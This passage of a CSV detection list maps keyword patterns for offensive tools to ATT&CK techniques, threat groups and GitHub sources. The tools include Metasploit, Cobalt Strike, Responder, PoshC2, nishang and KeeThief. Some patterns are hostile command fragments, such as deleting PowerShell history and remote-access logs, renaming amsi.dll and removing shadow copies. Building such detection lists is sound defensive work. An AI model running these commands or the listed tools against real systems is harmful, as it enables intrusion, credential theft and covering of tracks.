TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_exploit_cmd_stager.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_exploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*-remote=127.0.0.1:3000*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*remote-exec *jump *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*RemoteHashRetrieval.ps1*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*remote-method-guesser/rmg*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*remote-method-guesser-master*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*RemoteNTDLL.cpp*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*RemoteNTDLL.exe*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*remotereg.cna*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*RemoteScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*remotewinenum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Remove_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*removeexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Remove-Item (Get-PSreadlineOption).HistorySavePath*","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Remove-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*remove-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Remove-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*remove-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Remove-PoshRat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*removeRegTrace*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*Remove-Update.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Remove-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ren C:\Windows\System32\amsi.dll *.dll","greyware_tool_keyword","ren","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" +"*renameMachine.py -current-name * -new-name * -dc-ip * *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*renameMachine.py -current-name * -new-name*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*replace_key_iv_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*replace_video_fake_plugin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*RequestAsPython-PowerShell.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*reshacker_setup.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*ResourceDevelopment_EstablishAccounts_RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*ResourceDevelopment_Server_DNSLog.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*ResourceDevelopment_Server_LDAPServer.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*ResourceDevelopment_WebServices_TencentAPIGateway.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Resources/Design/NinjaStyle.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Resources/drone.dll*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Resources\donut.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*responder * --lm*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*responder -i *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*responder --interface*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Responder.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Responder/tools/MultiRelay/bin/Runas.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Responder/tools/MultiRelay/bin/Syssvc.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*responder-http-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*responder-http-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Responder-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*responder-smb-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*responder-smb-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Responder-Windows*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" 